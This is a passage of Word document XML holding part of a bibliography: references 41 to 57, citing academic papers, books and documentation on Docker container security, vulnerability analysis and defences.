                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">D. Huang, H. Cui, S. Wen and C. Huang, “Security Analysis and Threats Detection Techniques on Docker Container,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2019 IEEE 5th International Conference on Computer and Communications (ICCC), </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1214-1220, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2F252B30" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1E0F83E2" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[41] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="54432667" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. Martin, S. Raponi, T. Combe and e. el, “Docker ecosystem – Vulnerability Analysis,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Computer Communications, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 122, no. 6, pp. 30-43, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="6CC395D3" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3FF6AE40" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[42] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7587909C" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">H. Zhu and C. Gehrmann, “Lic-Sec: An enhanced AppArmor Docker security profile generator,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Journal of Information Security and Applications, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 61, p. 102924, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="56C14A6D" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2657A1E3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[43] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0AEA3A0A" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. Efe, U. Aslan and e. al, “Securing Vulnerabilities in Docker Images,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">International Journal of Innovative Engineering Applications, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 4, no. 1, pp. 31-39, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="362FB38B" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="50512BA9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[44] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5504DA18" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Gallagher, Securing Docker, Packt Publishing, 2016. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="0726D2F3" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5F07B9C1" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[45] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="466E0E49" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>docker , “docker,” docker , 2016. [Online]. Available: https://docs.docker.com/network/. [Accessed 11 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="46AF6940" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7777723D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[46] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3C6696AE" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">T. Combe, A. Martin and R. D. Pietro, “To Docker or Not to Docker: A Security Perspective,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">IEEE Cloud Computing, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 5, no. 3, pp. 54-62, 2016. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4BCBF5FD" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5265A67F" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[47] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="20B145B5" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>docker, “Content trust in Docker | Docker Documentation,” docker, 2016. [Online]. Available: https://docs.docker.com/engine/security/trust/. [Accessed 15 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="09BE08D0" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6AA8BE74" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[48] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="669F5648" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>github, “GitHub - theupdateframework/notary: Notary is a project that allows anyone to have trust over arbitrary collections of data,” github, [Online]. Available: https://github.com/theupdateframework/notary. [Accessed 12 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4509269D" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5A64C251" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[49] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="667F8473" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">D. Merkel, “Docker: lightweight linux containers for consistent development and deployment,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Linux journal, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 239, no. 2, pp. 1-5, 2014. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="10751A29" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0B1B3206" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[50] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2D5AD39E" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">X. Xu, A. Xu, Y. Jiang and e. al, “Research on Security Issues of Docker and Container Monitoring System in Edge Computing System,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Journal of Physics, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 1673, p. 012067, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="38F9D487" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="77794E7D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[51] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="03C50913" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">R. Yasrab, “Mitigating Docker Security Issues,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">arXiv preprint arXiv:1804.05039, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-11, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="481A4303" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="635B027A" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[52] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="357AEE71" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Z. Jian and L. Chen, “A Defense Method against Docker Escape Attack,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings of the 2017 International Conference on Cryptography, Security and Privacy, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 142-146, 2017. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="7B23D134" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="32899B63" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[53] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="641B01E0" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">M. D. Benedictis and A. Lioy, “Integrity verification of Docker containers for a lightweight cloud environment,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Future Generation Computer Systems, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 97, pp. 236-246, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="576B74BF" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="281DA823" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[54] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="14C7FE17" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">X. Lin, L. Lei, Y. Wang and et.el, “A Measurement Study on Linux Container Security: Attacks and Countermeasures,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings of the 34th Annual Computer Security Applications Conference, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 418-429, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="5C8D06E3" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="506AACA9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[55] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="276EB11A" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>OWASP, “Docker Security Cheat Sheet,” OWASP, [Online]. Available: https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html. [Accessed 14 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="753BF26C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="294E2781" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[56] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="364E4F10" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>E. Windisch, “On the Security of Containers,” 23 October 2014. [Online]. Available: https://medium.com/@ewindisch/on-the-security-of-containers-2c60ffe25a9e. [Accessed 15 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3FAE6020" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="17D022BB" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[57] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="26D11F66" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Upadhya, J. Shetty, R. Rajeshwari and e. al, “A State-of-Art Review of Docker Container Security Issues and Solutions,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">American International Journal of Research in Science, Technology, Engineering \&amp; Mathematics, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
